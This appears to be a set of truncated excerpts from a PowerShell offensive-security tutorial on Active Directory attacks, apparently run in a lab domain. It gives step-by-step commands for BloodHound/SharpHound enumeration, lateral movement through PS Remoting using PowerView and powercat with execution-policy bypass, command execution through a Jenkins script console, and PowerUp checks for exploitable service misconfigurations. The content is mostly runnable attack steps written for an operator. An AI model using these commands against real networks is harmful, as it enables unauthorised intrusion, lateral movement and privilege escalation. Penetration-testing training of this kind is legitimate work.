Powershell * POWERSHELL SECURITY

Domain Enumeration: Bloodhound

https://github.com/BloodHoundAD/BloodHound

Supply data to BloodHound:

PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Import-Module .\SharpHound.ps1
PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Invoke-BloodHound -CollectionMethod all -Verbose

Now download Neo4j from https://neo4j.com/download-center/#community, extract the archive and go to the bin folder:

PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9> cd .\bin\
PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin> dir

Now, in a command prompt:

C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat install-service
C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat start

Now download the BloodHound-win32-x64.zip file from https://github.com/BloodHoundAD/BloodHound/releases. After extraction, double-click the BloodHound.exe file. […]


Lateral Movement PS Remoting

One to one: we need a PowerShell session with admin rights to perform all of these tasks.

PS C:\WINDOWS\system32> Enable-PSRemoting -Force
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1
[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami […]


Local Privilege Escalation Part 2

I assume Jenkins is already present on the server and we have its credentials. After logging in, go to http://192.168.65.195:8080/scirpts/ , type the command below and click on Run.

Code:

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out>$sout err> $serr"

Now try […]


Local Privilege Escalation Part 1

Service issues using PowerUp:

PS C:\Users\victim.SECURITY\Downloads\ > Get-ServiceUnquoted -Verbose

Get services where the current user can write to the binary path or change the arguments passed to the binary:

PS C:\Users\victim.SECURITY\Downloads\ > Get-ModifiableServiceFile -Verbose

Get the services whose configuration […]